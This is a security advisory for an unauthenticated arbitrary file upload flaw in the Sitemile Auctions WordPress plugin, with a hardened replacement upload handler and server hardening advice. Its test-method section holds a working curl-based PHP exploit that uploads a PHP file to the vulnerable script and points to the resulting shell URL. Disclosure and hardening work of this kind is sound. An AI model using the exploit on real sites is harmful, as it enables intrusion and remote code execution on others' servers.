Release date:
Updated on:
Affected Systems:
WordPress sitemile auctions plugin 2.x
Description:
WordPress is a blogging engine written in PHP on top of a MySQL database; anyone can run their own blog on a server that supports PHP and MySQL.
The Sitemile Auctions plugin for WordPress, versions 2.0.1.3 and earlier, ships the script wp-content/plugins/auctionPlugin/uploadify/upload.php. The script accepts an upload with any file extension, without requiring authentication, and stores it under the web root in a directory taken from the request's folder parameter. An attacker can execute arbitrary PHP code by uploading a malicious PHP script and then requesting it through the web server.
<* Source: Sammy forgit
Link: http://secunia.com/advisories/49497/
http://www.opensyscom.fr/Actualites/wordpress-plugins-wordpress-auctions-plugin-arbitrary-file-upload-vulnerability.html
*>
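The fix that addresses the root cause is server-side: the upload handler must decide who may upload, where the file goes, and what name and type it gets. The block below is an added example written for this page, not the plugin's own code or a vendor patch. It contrasts the vulnerable Uploadify-style pattern (reproduced in a comment) with a hardened handler. It assumes WordPress is loaded, so that current_user_can(), check_ajax_referer() and wp_upload_dir() are available, and that the uploader posts a nonce in a "_wpnonce" field; the field name, the "auction-upload" nonce action and the AUCTION_* constants are assumptions for the example.

```php
<?php
// Added example (not the plugin's or WordPress' own code): a hardened
// replacement for a Uploadify-style upload.php. Assumes WordPress is loaded
// (current_user_can, check_ajax_referer, wp_upload_dir exist) and that the
// client posts its nonce in "_wpnonce"; the nonce action "auction-upload"
// and the AUCTION_* names are assumptions for this example.

// The vulnerable shape described in the advisory, reproduced only for contrast:
//   $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
//   move_uploaded_file($_FILES['Filedata']['tmp_name'],
//                      $targetPath . $_FILES['Filedata']['name']);
// No authentication, caller-chosen directory, attacker-chosen name/extension.

const AUCTION_ALLOWED_EXT  = ['jpg', 'jpeg', 'png', 'gif'];
const AUCTION_ALLOWED_MIME = ['image/jpeg', 'image/png', 'image/gif'];

/**
 * Validate one $_FILES entry and return a safe destination path, or throw.
 * $uploadsRoot is chosen by the server; the client never influences it.
 */
function auction_safe_destination(array $file, string $uploadsRoot): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    // Allowlist the last extension. "shell.php.jpg" passes as .jpg here, but
    // the name is regenerated below, so the double extension never hits disk.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, AUCTION_ALLOWED_EXT, true)) {
        throw new RuntimeException('extension not allowed');
    }

    // Inspect the content; $file['type'] is supplied by the client and is
    // worthless as a control.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!in_array($mime, AUCTION_ALLOWED_MIME, true)) {
        throw new RuntimeException('content is not an image');
    }

    // Server-generated name: nothing from the client ends up in the path.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($uploadsRoot, '/') . '/' . $name;

    // Defence in depth: the resolved directory must stay under $uploadsRoot.
    $realRoot = realpath($uploadsRoot);
    $realDir  = realpath(dirname($dest));
    if ($realRoot === false || $realDir === false || strpos($realDir, $realRoot) !== 0) {
        throw new RuntimeException('destination escapes uploads directory');
    }
    return $dest;
}

// Request handling: authenticate and check the CSRF token before touching
// the file at all.
if (!current_user_can('upload_files')) {
    http_response_code(403);
    exit('forbidden');
}
check_ajax_referer('auction-upload', '_wpnonce');   // dies on a bad nonce

if (empty($_FILES['Filedata'])) {
    http_response_code(400);
    exit('no file');
}

try {
    $uploads = wp_upload_dir();                      // server-chosen directory
    $dest = auction_safe_destination($_FILES['Filedata'], $uploads['path']);
    if (!move_uploaded_file($_FILES['Filedata']['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);
    echo json_encode(['url' => $uploads['url'] . '/' . basename($dest)]);
} catch (RuntimeException $e) {
    http_response_code(400);
    echo json_encode(['error' => $e->getMessage()]);
}
```

Pair the handler with a web-server rule that refuses to execute scripts under wp-content/uploads (for Apache, a .htaccess in that directory that removes the PHP handler; for nginx, a location block that denies .php there). That way a file that slips past the checks, or one left behind by an earlier exploitation of the vulnerable script, still cannot run.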
Test method:
Alert
The following procedure may be offensive and is intended only for security research and teaching. Use it at your own risk!
Sammy Forgit () provides the following test method:
postshell.php
<?php
// Exploit as provided in the advisory (cleaned up): posts lo.php to the
// unauthenticated Uploadify handler and lets the "folder" parameter pick
// the destination directory under the web root.
$uploadfile = "lo.php";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/auctionPlugin/uploadify/upload.php?folder=/wordpress/wp-content/uploads/");
curl_setopt($ch, CURLOPT_POST, true);
// "Filedata" is the field name Uploadify's upload.php reads from $_FILES.
// The "@file" prefix is the pre-PHP 5.5 upload syntax; on PHP 5.5+ use
// array('Filedata' => new CURLFile($uploadfile)) instead.
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell access: http://www.exemple.com/wordpress/wp-content/uploads/lo.php
Filename: after postshell.php has executed, view the source of its response (Ctrl-U) to see the name under which the file was stored.
lo.php
<?php
phpinfo();
?>
Suggestion:
Vendor patch:
WordPress
---------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://wordpress.org/
Note that the vulnerable component is the Sitemile Auctions plugin, not WordPress core: update the plugin to a fixed version and, until then, block unauthenticated access to its uploadify/upload.php script and disable PHP execution in wp-content/uploads.